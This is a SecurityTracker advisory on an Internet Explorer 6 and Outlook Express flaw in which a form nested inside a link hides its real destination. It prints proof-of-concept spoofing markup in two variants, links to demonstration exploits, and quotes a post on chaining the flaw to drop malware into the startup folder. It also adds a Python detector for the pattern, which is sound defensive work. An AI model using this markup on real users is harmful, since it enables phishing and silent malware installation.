SecurityTracker.com
Category:  Application (Web Browser)  >  Microsoft Internet Explorer (IE)
Vendors:  Microsoft
Microsoft Internet Explorer Does Not Correctly Display Links With Embedded FORM Data
SecurityTracker Alert ID:  1009604
SecurityTracker URL:  http://securitytracker.com/id?1009604
CVE Reference:  CAN-2004-1104
Updated:  Dec 1 2004
Original Entry Date:  Mar 31 2004
Impact:  Modification of system information
Exploit Included:  Yes  
Version(s): 6
Description:  A vulnerability was reported in Microsoft Internet Explorer. A remote user can create HTML with an embedded link that spoofs the destination URL and causes the browser to fail to display the actual destination URL. Microsoft Outlook Express is also affected.

malware reported that a remote user can create HTML that contains a link with an HTML FORM action embedded within the link. The browser's status bar will display the link address but not the FORM action address. However, the browser will load the FORM action.

Demonstration exploit HTML can be in the following form:

<A href="http://[apparent destination]">
<FORM action=[actual destination] method=get>
<INPUT style="BORDER-RIGHT: 0pt; BORDER-TOP: 0pt; FONT-SIZE: 10pt; BORDER-LEFT: 0pt;
CURSOR: hand; COLOR: blue; BORDER-BOTTOM: 0pt; BACKGROUND-COLOR: transparent;
TEXT-DECORATION: underline" type=submit value=http://[apparent destination]>
</A>

A remote user can create HTML with a spoofed link that, when loaded by the target user, will direct the target user's browser to a malicious URL, which can then redirect the target user to the apparent destination shown in the spoofed link. In this manner, the target user may be completely unaware of the malicious action.

A demonstration exploit is available at:

http://www.malware.com/not-so-good.zip

In October 2004, malware reported that a BASE HREF tag is also affected [CVE: CAN-2004-1104]. A demonstration exploit is provided:

<base href="http://www.microsoft.com">

<a href=><form action="http://www.malware.com"
method="get"><INPUT style="BORDER-RIGHT: 0pt; BORDER-TOP: 0pt;
FONT-SIZE: 10pt; BORDER-LEFT: 0pt;
CURSOR: hand; COLOR: blue; BORDER-BOTTOM: 0pt; BACKGROUND-COLOR:
transparent;TEXT-DECORATION: underline" type=submit
value=http://www.microsoft.com></form></a>

A demonstration exploit is available at:

http://www.malware.com/mwaresoft.html
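
A check that a mail or web content filter could run for the markup described above, as an added example that is not part of the original advisory: it flags any FORM nested inside a link whose action host differs from the host the link (or BASE HREF) displays. The class and function names are assumptions, and the sample markup is constructed from the hosts used in the demonstrations above.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

def host_of(base, ref):
    """Host that ref resolves to against base; "" if relative or malformed."""
    try:
        return urlsplit(urljoin(base, ref or "")).hostname or ""
    except ValueError:
        return ""

class LinkFormSpoofDetector(HTMLParser):  # hypothetical name
    def __init__(self):
        super().__init__()
        self.base = ""      # most recent <base href>
        self.anchors = []   # displayed host of every <a> still open
        self.findings = []  # (host shown for the link, host the form loads)

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "base" and a.get("href"):
            self.base = a["href"]
        elif tag == "a":
            # An empty href (<a href=>) resolves to the base URL.
            self.anchors.append(host_of(self.base, a.get("href")))
        elif tag == "form" and self.anchors:
            shown, actual = self.anchors[-1], host_of(self.base, a.get("action"))
            # A relative action with no base has no host and is not flagged.
            if actual and actual != shown:
                self.findings.append((shown, actual))

    def handle_endtag(self, tag):
        if tag == "a" and self.anchors:
            self.anchors.pop()

def find_spoofed_links(html):
    parser = LinkFormSpoofDetector()
    parser.feed(html)
    parser.close()
    return parser.findings

# Constructed samples modelled on the two demonstrations in this advisory.
FORM_IN_LINK = ('<A href="http://www.microsoft.com">\n'
                '<FORM action=http://www.malware.com/t-bill.html method=get>\n'
                '<INPUT type=submit value=http://www.microsoft.com>\n</A>')
BASE_HREF_VARIANT = ('<base href="http://www.microsoft.com">\n'
                     '<a href=><form action="http://www.malware.com" method="get">'
                     '<INPUT type=submit value=http://www.microsoft.com></form></a>')
BENIGN = ('<a href="http://example.org/"><form action="http://example.org/q">'
          '</form></a><form action="http://example.org/s"></form>')
```
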

Impact:  A remote user can create a spoofed link that will load an arbitrary URL.
Solution:  No solution was available at the time of this entry.
Vendor URL:  www.microsoft.com/technet/security/
Cause:  Input validation error, State error
Underlying OS:  Windows (Any)
Reported By:  "http-equiv@excite.com" <1@malware.com>
Message History:   This archive entry has one or more follow-up message(s) listed below.
Feb 17 2005 (A Variation is Reported) Microsoft Internet Explorer Does Not Correctly Display Links With Embedded FORM Data   ("winter bitlance" <bitlance_3@hotmail.com>)
A variation has been reported.



 Source Message Contents

Date:  Wed, 31 Mar 2004 18:04:54 -0000
From:  "http-equiv@excite.com" <1@malware.com>
Subject:  NOT GOOD: Outlook Express 6 + Internet Explorer 6

 



Wednesday, March 31, 2004

This is somewhat disconcerting. Reference the recently disclosed 
Internet Explorer 'bug' presently in the wild [original 
discussion: http://www.securityfocus.com/archive/1/358813 with 
additional input buried thereunder in subsequent threads] 
allowing for complete remote compromise of the client machine 
without any user interaction other than viewing a webpage, 
through yet again, the Microsoft Internet Explorer browser. 

A lot of 'chatter' or very bold claims 'having been the first to 
see this and analyse it' seem to have appeared recently that 
would make this particular bug well known for at least 6 weeks 
now. We must assume that these claimants had immediately 
notified the manufacturer of this particular device that allows 
for all of this immediately back then. Accordingly 6 weeks have 
transpired and to date all users of this particular merchant's 
product remain vulnerable.

It still remains "unpatched". 

Perhaps to speed things up, the introduction of the Outlook 
Express email client from the same merchant might be necessary:

Commence:

Outlook Express number 6 has fairly stringent security settings 
in default mode, most notable, setting all actions in the so-
called 'restricted zone'. This disallows such things as frames, 
scripting, objects etc. 

However it does allow for one interesting piece of html

Forms:

<A
href="http://www.microsoft.com">
<FORM action=http://www.malware.com/t-bill.html method=get>
<INPUT style="BORDER-RIGHT: 0pt;
BORDER-TOP: 0pt; FONT-SIZE: 10pt; BORDER-LEFT: 0pt; CURSOR: 
hand; COLOR:
blue; BORDER-BOTTOM: 0pt; BACKGROUND-COLOR: transparent;
TEXT-DECORATION: underline" type=submit 
value=http://www.microsoft.com>
</A>

What is of particular interest is that if we encase our html 
form with a run-of-the-mill 'link', we are able to spoof in our 
status bar our true destination:

[screen shot: http://www.malware.com/not-good.png 24KB]

as well as re-style our form to suit our needs.

What we then do is construct our original functional demo to:

a) redirect immediately on loading to the 'suggested' address; 
that is http://www.microsoft.com
b) at that instance [prior], drop our malware.exe into our 
startup folder for execution the next day

while the recipient is blissfully unaware viewing the site as 
indicated.

Fully Functional Harmless Demo:

http://www.malware.com/not-so-good.zip

note: regardless of where this is viewed, it is governed by 
the 'restricted zone' at all times

In this particular demo, we drop malware.exe into C: trivial 
tweaking via shell or full path places it wherever we like. This 
fully functional demo is heavily diluted. Practical 
implementation requires minor modifications on the 
transmitting client side. This demo will be flagged by AV suites 
owing to past usage and recognisable code.


End Call


-- 
http://www.malware.com




Copyright 2005, SecurityGlobal.net LLC